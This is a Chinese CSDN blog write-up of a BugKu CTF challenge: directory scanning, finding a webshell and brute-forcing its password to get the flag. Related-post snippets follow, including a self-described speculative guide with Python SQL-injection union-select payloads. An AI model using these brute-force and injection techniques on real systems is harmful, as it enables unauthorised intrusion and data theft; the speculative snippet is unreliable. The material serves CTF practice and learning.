BugKu_网站被黑

最新推荐文章于 2024-10-18 22:38:07 发布
原创 最新推荐文章于 2024-10-18 22:38:07 发布 · 478 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全性测试

本文讲述了作者如何发现并分析一个被黑客入侵的网站,通过追踪线索找到webshell,最终破解并获取flag的过程,深入探讨了网络安全和渗透测试技巧。

网站被黑

在这里插入图片描述
访问目标地址,发现是一个黑页
在这里插入图片描述

再根据描述中说的可能会有后门,猜测可能存在webshell,扫描目录发现shell.php
在这里插入图片描述
访问shell.php,发现是个webshell
在这里插入图片描述
爆破webshell的密码,发现密码是“hack”
在这里插入图片描述
在webshell中输入密码,成功得到flag
在这里插入图片描述

CTF之Bugku网站
weixin_41607190的博客
09-25 1万+
点开是这么一个面 晃来晃去还挺好玩的 标题是网站,用御剑扫描一下他的后台,看能不能扫到webshell,也就是一个后门。(不了解webshell的童鞋去搜下) 扫一下就出来了 点进去是一个输入密码的界面,那么接下来就去爆破密码,用的工具是BurpSuite pro,后面会给大家放上来。 首先要抓包,就是用Burp Suite去截取网的请求。 ...
Bugku WEB 网站(超详细题解 WP)
2301_81212117的博客
04-06 2688
1、dirsearch扫描;2、burp抓包;3、修改请求头;4、添加payload,密码爆破;5、登录得到flag
Bugku-网站
热门推荐
小水池
08-10 6万+
网站 http://120.24.86.145:8002/webshell/ 这个题没技术含量但是实战中经常遇到 解题思路: 打开链接是一个,链接后面加index.php判断是PHP,而题目提示实战中经常遇到,那就开御剑扫描后台吧  扫描出shell.php,打开链接是一个webshell,尝试admin等弱密码无效后  开burp进行爆破,这里选择Simple l...
BugKu-网站
苟有恒,必有三更眠,五更起。
08-06 501
BugKu-网站 原题链接 http://120.24.86.145:8002/webshell/ 分析 一眼看去,没什么发现,扫一下有没有源码泄露之类的,结果扫除了一个shell.php 扫描.png 其实,意思就是后门了。 进入shell.php ,发现要求输入一个密码,Burp弱口令爆破即可。 爆破.png flag ...
Bugku 网站
ChenZIDu的博客
04-13 627
后台扫描+爆破 进入网看到一个画面 发现没什么内容,利用御剑工具进行后台扫描: 出来两个网址,点击下一个进入到一个网 随机输入密码,发现不对,利用Burp抓包该网, 进行爆破 点击这个添加一个passwords,点击右上角start attack 开始进行爆破。 首先要输入一次密码! 爆破结果hack,输入得到flag: ...
CTF练习题——bugkuCTF 网站题目思路分析
Jum的博客
11-13 3511
今天继续战斗WEB漏洞题目,好好学习天天向上。
Bugku网站-ctf练习
lshandel的博客
07-11 693
记录一下一道简单但是自己尽量的不借助工具创造工具解决的一道题,好像大家都是用御剑解决的,但是macOS下是没有这个软件的,所以这里也提供一个mac下的解决方法 题目描述 网站客会不会留下后门 需要的工具 1.dirsearch 直接github下载就可,20M且在命令行使用非常方便 安装包下载地址:https://github.com/maurosoria/dirsearch 2.python3.6以上版本(版本要求是为了使用dirsearch) 首先分析一波 很嚣张,获得webshell以后
BugkuCTF:网站;管理员系统;web4
s0il的博客
01-27 1466
网站 后台扫描工具(第一次用),御剑扫描:                  除了我们看到的index.php,还有shell.php: 访问一波,要密码,flag应该隐藏在这个密码后边:                                                    用Burp suite爆破: 浏览器选择burpsuite代理,打开监视,访问网站,输入密...
bugku 网站
CTF
02-01 548
直接爆出pass:hack,输入登录即刻出现flag。flag{5d72824ac552be6dd0c5b88b5c444e93}打开容器后发现是,先查看源代码,一般都是先查看源代码。接着直接进行dirsearch扫描,发现一个shell.php文件。访问后发现是一个webshell面。先尝试进行登录,发现不成功。直接用bp抓包爆破。
bugku web 网站
l181954187的博客
03-31 397
先进行xxf伪造,X-Forwarded-For: 127.0.0.1,然后就可以直接爆破密码了。F12看源码啥也没有,用dirsearch扫一下目录看看。还提示了,估计应该限制ip了,抓包看看。使用自带全量字典扫描单个url的目录。进去看看,随便试试几个密码都不对。开始攻击,成功获得密码。输入密码得到flag。
Bugku-web-网站
weixin_57524749的博客
08-18 775
代理开启抓包-----》发送到攻击模块-----》密码位置添加payload-----》攻击类型为狙击手。来到payload中-----》从文件加载------》添加密码字典-----》开始攻击。可以看到他有一个index.php地址。打开没有任何按钮,我们选择扫一下目录。点击打开,看到一个登录面需要密码。使用bp抓包爆破密码。登陆成功后得到flag。,而多字典攻击则包括。
Bugku——网站
weixin_71914594的博客
10-18 820
依然是F12看看能不能找到什么有用的信息。那就继续扫目录看看能不能找到突破点。既然只用爆破一个参数 那就不用修改。爆破完了 筛选一下不一样的返回值。右键发送到Intruder模块。还得是dirsearch神器。找出来shell.php。Bugku——网站。那就上bp抓包爆破看看。
BUGKU--网站
m0_65766842的博客
03-01 129
1
bugku网站
qq_52718293的博客
01-10 2439
这题能两个点 根据提示(网站客会不会留下后门) 1.首先尝试使用御剑扫描网站的目录 ![在这里插入图片描述](https://img-blog.csdnimg.cn/bcda5f9a940e4d2cac8a88ab56eb4846.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAKuWwj-eRtg==,size_20,color_FFFFFF,t_70,g index.php shell.
BUGKU-WEB 网站
默默提升实验室
02-16 950
BUGKU-WEB 网站,需要找后门文件
Bugku网站
金 帛的博客
03-21 4963
Bugku之WP
bugku just_sqli
最新发布
09-20
由于没有具体的参考引用内容,以下是关于Bugku平台just_sqli题目的一般分析与推测。 ### 题目详情推测 通常在Bugku这类CTF平台中,just_sqli题目往往是围绕SQL注入漏洞展开。题目可能会给出一个简单的Web面,面上有输入框用于接收用户输入,可能用于查询数据库中的某些信息,例如用户信息、文章列表等。面可能会根据输入的内容动态生成SQL查询语句并执行,而由于开发过程中没有对用户输入进行严格的过滤和转义,就导致了SQL注入漏洞的产生。 ### 解题思路 1. **判断注入点**: - 可以尝试在输入框中输入一些简单的特殊字符,如单引号 `'`、双引号 `"`、括号 `()` 等,观察面返回的错误信息。如果输入单引号后面出现数据库错误提示,那么很可能存在SQL注入漏洞,且注入点在单引号闭合处。 - 也可以使用 `and 1=1` 和 `and 1=2` 这样的语句来判断是否存在布尔盲注。如果输入 `and 1=1` 时面正常显示,输入 `and 1=2` 时面显示异常(如无结果返回等),则说明存在布尔盲注。 ```python # 示例代码,模拟布尔盲注测试 import requests url = 'http://example.com/just_sqli.php' payload_true = {'input': 'value and 1=1'} payload_false = {'input': 'value and 1=2'} response_true = requests.get(url, params=payload_true) response_false = requests.get(url, params=payload_false) if len(response_true.text) != len(response_false.text): print("可能存在布尔盲注漏洞") ``` 2. **确定数据库类型**: - 通过注入不同数据库特有的函数来判断数据库类型。例如,对于MySQL可以使用 `version()` 函数,对于SQL Server可以使用 `@@version`。 ```python # 示例代码,检测MySQL数据库版本 import requests url = 'http://example.com/just_sqli.php' payload = {'input': "value' union select version() -- "} response = requests.get(url, params=payload) print(response.text) ``` 3. **获取数据库信息**: - 利用注入漏洞获取数据库名、表名、列名等信息。在MySQL中,可以使用 `information_schema` 数据库来获取这些信息。 ```python # 示例代码,获取数据库中的表名 import requests url = 'http://example.com/just_sqli.php' payload = {'input': "value' union select table_name from information_schema.tables where table_schema=database() -- "} response = requests.get(url, params=payload) print(response.text) ``` 4. **获取数据内容**: - 当获取到表名和列名后,就可以获取具体的数据内容。 ```python # 示例代码,获取指定表中的数据 import requests url = 'http://example.com/just_sqli.php' table_name = 'users' column_name = 'username' payload = {'input': f"value' union select {column_name} from {table_name} -- "} response = requests.get(url, params=payload) print(response.text) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值